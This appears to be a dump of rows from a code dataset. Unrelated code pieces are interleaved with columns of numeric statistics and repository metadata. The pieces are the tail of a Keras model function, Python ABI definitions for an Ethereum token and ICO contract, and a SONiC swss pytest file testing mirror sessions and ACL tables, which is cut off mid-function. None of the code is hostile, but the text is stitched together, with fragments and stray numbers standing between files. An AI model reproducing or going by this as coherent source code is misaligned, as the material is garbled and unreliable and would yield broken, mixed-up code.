model = tf.keras.models.Sequential()
model.add(fe_model)
model.add(be_model)
return model # fe_model, be_model
| 40.229117
| 179
| 0.526103
| 2,079
| 16,856
| 4.186628
| 0.063011
| 0.17693
| 0.180607
| 0.12546
| 0.971967
| 0.964154
| 0.953125
| 0.953125
| 0.952551
| 0.952551
| 0
| 0.05512
| 0.3187
| 16,856
| 419
| 180
| 40.229117
| 0.702804
| 0.090532
| 0
| 0.92953
| 0
| 0
| 0.062672
| 0
| 0
| 0
| 0
| 0.002387
| 0
| 1
| 0.02349
| false
| 0
| 0.010067
| 0
| 0.057047
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fb90158fcfe607ad25f6442789066b6498ad677d
| 23,525
|
py
|
Python
|
am_smart_contracts_interface/am_abi.py
|
alphamarket-online/am_python_interface
|
8eeab7fc3dbfa670e9bb05467818015241e7ac23
|
[
"MIT"
] | null | null | null |
am_smart_contracts_interface/am_abi.py
|
alphamarket-online/am_python_interface
|
8eeab7fc3dbfa670e9bb05467818015241e7ac23
|
[
"MIT"
] | null | null | null |
am_smart_contracts_interface/am_abi.py
|
alphamarket-online/am_python_interface
|
8eeab7fc3dbfa670e9bb05467818015241e7ac23
|
[
"MIT"
] | null | null | null |
amc_abi = [{"constant":True,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"enableTransfering","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_subtractedValue","type":"uint256"}],"name":"decreaseApproval","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_owner","type":"address"}],"name":"balanceOf","outputs":[{"name":"balance","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_address","type":"address"}],"name":"addEarlyAccessAddress","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"isTransferEnabled","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_addedValue","type":"uint256"}],"name":"increaseApproval","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[{"name":"","type":"address"}],"name":"earlyAccess","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"controller","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"inputs":[{"name":"_controller","type":"address"}],"payable":False,"stateMutability":"nonpayable","type":"constructor"},{"payable":True,"stateMutability":"payable","type":"fallback"},{"anonymous":False,"inputs":[],"name":"TransferEnabled","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"name":"owner","type":"address"},{"indexed":True,"name":"spender","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"name":"from","type":"address"},{"indexed":True,"name":"to","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"Transfer","type":"event"}]
am_ico_abi = [{"constant":True,"inputs":[],"name":"maxInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"to","type":"address"},{"name":"value","type":"uint256"}],"name":"transferEther","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"totalInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"withdrawRefund","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_token","type":"address"}],"name":"setToken","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_owner","type":"address"}],"name":"removeOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[],"name":"updateState","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_owners","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"endTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"referrer","type":"address"}],"name":"buyTokensWithRef","outputs":[],"payable":True,"stateMutability":"payable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"bytes32"}],"name":"m_pending","outputs":[{"name":"yetNeeded","type":"uint256"},{"name":"ownersDone","type":"uint256"},{"name":"index","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"m_numOwners","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_bountyWallet","type":"address"}],"name":"sendTokensToBountyWallet","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"icoState","outputs":[{"name":"","type":"uint8"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"isBountySent","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"exchanger","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_contributors","type":"address[]"},{"name":"_tokenAmounts","type":"uint256[]"}],"name":"rewardContributors","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"tokenUnfreezeTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_owner","type":"address"}],"name":"addOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"m_required","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"startTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"tokensToSold","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"minInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"totalSold","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[{"name":"","type":"address"}],"name":"investments","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"isContributorsRewarded","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"failICO","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"m_chiefOwnerIndexBit","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_operation","type":"bytes32"}],"name":"revoke","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_newRequired","type":"uint256"}],"name":"changeRequirement","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_operation","type":"bytes32"},{"name":"_owner","type":"address"}],"name":"hasConfirmed","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"buyTokens","outputs":[],"payable":True,"stateMutability":"payable","type":"function"},{"constant":False,"inputs":[{"name":"_exchanger","type":"address"}],"name":"setExchanger","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_ownerIndex","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"}],"name":"changeOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_pendingIndex","outputs":[{"name":"","type":"bytes32"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"hardCap","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"token","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"inputs":[{"name":"_owners","type":"address[]"}],"payable":False,"stateMutability":"nonpayable","type":"constructor"},{"payable":True,"stateMutability":"payable","type":"fallback"},{"anonymous":False,"inputs":[{"indexed":True,"name":"to","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"EtherTransfered","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"state","type":"uint8"}],"name":"StateUpdated","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"from","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"InvestmentProcessed","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"owner","type":"address"},{"indexed":False,"name":"operation","type":"bytes32"}],"name":"Confirmation","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"owner","type":"address"},{"indexed":False,"name":"operation","type":"bytes32"}],"name":"Revoke","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"oldOwner","type":"address"},{"indexed":False,"name":"newOwner","type":"address"}],"name":"OwnerChanged","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"newOwner","type":"address"}],"name":"OwnerAdded","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"oldOwner","type":"address"}],"name":"OwnerRemoved","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"newRequirement","type":"uint256"}],"name":"RequirementChanged","type":"event"}]
test_amc_abi = [{"constant":True,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_value","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"enableTransfering","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_subtractedValue","type":"uint256"}],"name":"decreaseApproval","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_owner","type":"address"}],"name":"balanceOf","outputs":[{"name":"balance","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_address","type":"address"}],"name":"addEarlyAccessAddress","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_to","type":"address"},{"name":"_value","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"isTransferEnabled","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_spender","type":"address"},{"name":"_addedValue","type":"uint256"}],"name":"increaseApproval","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_owner","type":"address"},{"name":"_spender","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[{"name":"","type":"address"}],"name":"earlyAccess","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"controller","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"inputs":[{"name":"_controller","type":"address"}],"payable":False,"stateMutability":"nonpayable","type":"constructor"},{"payable":True,"stateMutability":"payable","type":"fallback"},{"anonymous":False,"inputs":[],"name":"TransferEnabled","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"name":"owner","type":"address"},{"indexed":True,"name":"spender","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":False,"inputs":[{"indexed":True,"name":"from","type":"address"},{"indexed":True,"name":"to","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"Transfer","type":"event"}]
test_am_ico_abi = [{"constant":True,"inputs":[],"name":"maxInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"to","type":"address"},{"name":"value","type":"uint256"}],"name":"transferEther","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"totalInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"withdrawRefund","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_token","type":"address"}],"name":"setToken","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_owner","type":"address"}],"name":"removeOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[],"name":"updateState","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_owners","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_newTime","type":"uint256"}],"name":"setCurrentTime","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"endTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"referrer","type":"address"}],"name":"buyTokensWithRef","outputs":[],"payable":True,"stateMutability":"payable","type":"function"},{"constant":False,"inputs":[{"name":"_totalSold","type":"uint256"}],"name":"setTotalSold","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"testTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[{"name":"","type":"bytes32"}],"name":"m_pending","outputs":[{"name":"yetNeeded","type":"uint256"},{"name":"ownersDone","type":"uint256"},{"name":"index","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"m_numOwners","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_bountyWallet","type":"address"}],"name":"sendTokensToBountyWallet","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"icoState","outputs":[{"name":"","type":"uint8"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"isBountySent","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"exchanger","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_contributors","type":"address[]"},{"name":"_tokenAmounts","type":"uint256[]"}],"name":"rewardContributors","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"tokenUnfreezeTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_owner","type":"address"}],"name":"addOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"m_required","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"startTime","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"tokensToSold","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"minInvestment","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"totalSold","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[{"name":"","type":"address"}],"name":"investments","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"isContributorsRewarded","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"failICO","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[],"name":"m_chiefOwnerIndexBit","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_operation","type":"bytes32"}],"name":"revoke","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_newRequired","type":"uint256"}],"name":"changeRequirement","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"_operation","type":"bytes32"},{"name":"_owner","type":"address"}],"name":"hasConfirmed","outputs":[{"name":"","type":"bool"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[],"name":"buyTokens","outputs":[],"payable":True,"stateMutability":"payable","type":"function"},{"constant":False,"inputs":[{"name":"_hardCap","type":"uint256"}],"name":"setHardCap","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":False,"inputs":[{"name":"_exchanger","type":"address"}],"name":"setExchanger","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_ownerIndex","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":False,"inputs":[{"name":"_from","type":"address"},{"name":"_to","type":"address"}],"name":"changeOwner","outputs":[],"payable":False,"stateMutability":"nonpayable","type":"function"},{"constant":True,"inputs":[{"name":"","type":"uint256"}],"name":"m_pendingIndex","outputs":[{"name":"","type":"bytes32"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"hardCap","outputs":[{"name":"","type":"uint256"}],"payable":False,"stateMutability":"view","type":"function"},{"constant":True,"inputs":[],"name":"token","outputs":[{"name":"","type":"address"}],"payable":False,"stateMutability":"view","type":"function"},{"inputs":[{"name":"_owners","type":"address[]"}],"payable":False,"stateMutability":"nonpayable","type":"constructor"},{"payable":True,"stateMutability":"payable","type":"fallback"},{"anonymous":False,"inputs":[{"indexed":True,"name":"to","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"EtherTransfered","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"state","type":"uint8"}],"name":"StateUpdated","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"from","type":"address"},{"indexed":False,"name":"value","type":"uint256"}],"name":"InvestmentProcessed","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"owner","type":"address"},{"indexed":False,"name":"operation","type":"bytes32"}],"name":"Confirmation","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"owner","type":"address"},{"indexed":False,"name":"operation","type":"bytes32"}],"name":"Revoke","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"oldOwner","type":"address"},{"indexed":False,"name":"newOwner","type":"address"}],"name":"OwnerChanged","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"newOwner","type":"address"}],"name":"OwnerAdded","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"oldOwner","type":"address"}],"name":"OwnerRemoved","type":"event"},{"anonymous":False,"inputs":[{"indexed":False,"name":"newRequirement","type":"uint256"}],"name":"RequirementChanged","type":"event"}]
| 3,360.714286
| 8,436
| 0.657301
| 2,387
| 23,525
| 6.442396
| 0.049434
| 0.076733
| 0.196645
| 0.09299
| 0.992197
| 0.992197
| 0.992197
| 0.992197
| 0.992197
| 0.992197
| 0
| 0.010974
| 0.000595
| 23,525
| 7
| 8,436
| 3,360.714286
| 0.643103
| 0
| 0
| 0
| 0
| 0
| 0.596532
| 0.005696
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
839e79c018a40f4339b768ed15ff8b43b686ab75
| 19,188
|
py
|
Python
|
tests/test_mirror_ipv6_separate.py
|
linemma/sonic-swss
|
2e3b94633eaeff479f6ad4ff5d47f3000f6e5ef8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_mirror_ipv6_separate.py
|
linemma/sonic-swss
|
2e3b94633eaeff479f6ad4ff5d47f3000f6e5ef8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_mirror_ipv6_separate.py
|
linemma/sonic-swss
|
2e3b94633eaeff479f6ad4ff5d47f3000f6e5ef8
|
[
"Apache-2.0"
] | null | null | null |
# This test suite covers the functionality of mirror feature in SwSS
import platform
import pytest
import time
from distutils.version import StrictVersion
from swsscommon import swsscommon
DVS_FAKE_PLATFORM = "mellanox"
class TestMirror(object):
def setup_db(self, dvs):
self.pdb = swsscommon.DBConnector(0, dvs.redis_sock, 0)
self.adb = swsscommon.DBConnector(1, dvs.redis_sock, 0)
self.cdb = swsscommon.DBConnector(4, dvs.redis_sock, 0)
self.sdb = swsscommon.DBConnector(6, dvs.redis_sock, 0)
def set_interface_status(self, interface, admin_status):
if interface.startswith("PortChannel"):
tbl_name = "PORTCHANNEL"
elif interface.startswith("Vlan"):
tbl_name = "VLAN"
else:
tbl_name = "PORT"
tbl = swsscommon.Table(self.cdb, tbl_name)
fvs = swsscommon.FieldValuePairs([("admin_status", "up")])
tbl.set(interface, fvs)
time.sleep(1)
def add_ip_address(self, interface, ip):
if interface.startswith("PortChannel"):
tbl_name = "PORTCHANNEL_INTERFACE"
elif interface.startswith("Vlan"):
tbl_name = "VLAN_INTERFACE"
else:
tbl_name = "INTERFACE"
tbl = swsscommon.Table(self.cdb, tbl_name)
fvs = swsscommon.FieldValuePairs([("NULL", "NULL")])
tbl.set(interface + "|" + ip, fvs)
time.sleep(1)
def remove_ip_address(self, interface, ip):
if interface.startswith("PortChannel"):
tbl_name = "PORTCHANNEL_INTERFACE"
elif interface.startswith("Vlan"):
tbl_name = "VLAN_INTERFACE"
else:
tbl_name = "INTERFACE"
tbl = swsscommon.Table(self.cdb, tbl_name)
tbl._del(interface + "|" + ip)
time.sleep(1)
def add_neighbor(self, interface, ip, mac):
tbl = swsscommon.ProducerStateTable(self.pdb, "NEIGH_TABLE")
fvs = swsscommon.FieldValuePairs([("neigh", mac),
("family", "IPv4")])
tbl.set(interface + ":" + ip, fvs)
time.sleep(1)
def remove_neighbor(self, interface, ip):
tbl = swsscommon.ProducerStateTable(self.pdb, "NEIGH_TABLE")
tbl._del(interface + ":" + ip)
time.sleep(1)
def add_route(self, dvs, prefix, nexthop):
dvs.runcmd("ip route add " + prefix + " via " + nexthop)
time.sleep(1)
def remove_route(self, dvs, prefix):
dvs.runcmd("ip route del " + prefix)
time.sleep(1)
def create_mirror_session(self, name, src, dst, gre, dscp, ttl, queue):
tbl = swsscommon.Table(self.cdb, "MIRROR_SESSION")
fvs = swsscommon.FieldValuePairs([("src_ip", src),
("dst_ip", dst),
("gre_type", gre),
("dscp", dscp),
("ttl", ttl),
("queue", queue)])
tbl.set(name, fvs)
time.sleep(1)
def remove_mirror_session(self, name):
tbl = swsscommon.Table(self.cdb, "MIRROR_SESSION")
tbl._del(name)
time.sleep(1)
def get_mirror_session_status(self, name):
return self.get_mirror_session_state(name)["status"]
def get_mirror_session_state(self, name):
tbl = swsscommon.Table(self.sdb, "MIRROR_SESSION")
(status, fvs) = tbl.get(name)
assert status == True
assert len(fvs) > 0
return { fv[0]: fv[1] for fv in fvs }
def create_acl_table(self, table, interfaces, type):
tbl = swsscommon.Table(self.cdb, "ACL_TABLE")
fvs = swsscommon.FieldValuePairs([("policy_desc", "mirror_test"),
("type", type),
("ports", ",".join(interfaces))])
tbl.set(table, fvs)
time.sleep(1)
def remove_acl_table(self, table):
tbl = swsscommon.Table(self.cdb, "ACL_TABLE")
tbl._del(table)
time.sleep(1)
def create_mirror_acl_ipv4_rule(self, table, rule, session):
tbl = swsscommon.Table(self.cdb, "ACL_RULE")
fvs = swsscommon.FieldValuePairs([("priority", "1000"),
("mirror_action", session),
("SRC_IP", "10.0.0.0/32"),
("DST_IP", "20.0.0.0/23")])
tbl.set(table + "|" + rule, fvs)
time.sleep(1)
def create_mirror_acl_ipv6_rule(self, table, rule, session):
tbl = swsscommon.Table(self.cdb, "ACL_RULE")
fvs = swsscommon.FieldValuePairs([("priority", "1000"),
("mirror_action", session),
("SRC_IPV6", "2777::0/64"),
("DST_IPV6", "3666::0/128")])
tbl.set(table + "|" + rule, fvs)
time.sleep(1)
def remove_mirror_acl_rule(self, table, rule):
tbl = swsscommon.Table(self.cdb, "ACL_RULE")
tbl._del(table + "|" + rule)
time.sleep(1)
# Test case - create a MIRROR table and a MIRRORV6 table in separated mode
# 0. predefine the VS platform: mellanox platform
# 1. create a mirror session
# 2. create two ACL tables that support IPv4 and IPv6 separatedly
# 3. create two ACL rules with both IPv4 and IPv6 source and destination IP
# verify the ACL rules are created successfully
# 4. remove all the configurations
def test_AclBindMirrorSeparated(self, dvs, testlog):
"""
This test verifies IPv6 rules cannot be inserted into MIRROR table
"""
self.setup_db(dvs)
session = "MIRROR_SESSION"
acl_table = "MIRROR_TABLE"
acl_table_v6 = "MIRROR_TABLE_V6"
acl_rule_1 = "MIRROR_RULE_1"
acl_rule_2 = "MIRROR_RULE_2"
# bring up port; assign ip; create neighbor; create route
self.set_interface_status("Ethernet32", "up")
self.add_ip_address("Ethernet32", "20.0.0.0/31")
self.add_neighbor("Ethernet32", "20.0.0.1", "02:04:06:08:10:12")
self.add_route(dvs, "4.4.4.4", "20.0.0.1")
# create mirror session
self.create_mirror_session(session, "3.3.3.3", "4.4.4.4", "0x6558", "8", "100", "0")
assert self.get_mirror_session_state(session)["status"] == "active"
# assert mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 1
mirror_session_oid = tbl.getKeys()[0]
# create acl table ipv4
self.create_acl_table(acl_table, ["Ethernet0", "Ethernet4"], "MIRROR")
# assert acl table ipv4 is created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_TABLE")
table_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_tables]
assert len(table_entries) == 1
table_id_v4 = table_entries[0]
# create acl table ipv6
self.create_acl_table(acl_table_v6, ["Ethernet0", "Ethernet4"], "MIRRORV6")
# assert acl table ipv6 is created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_TABLE")
table_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_tables]
assert len(table_entries) == 2
table_id_v6 = table_entries[1] if table_entries[0] == table_id_v4 else table_entries[0]
# create acl rule with IPv4 addresses
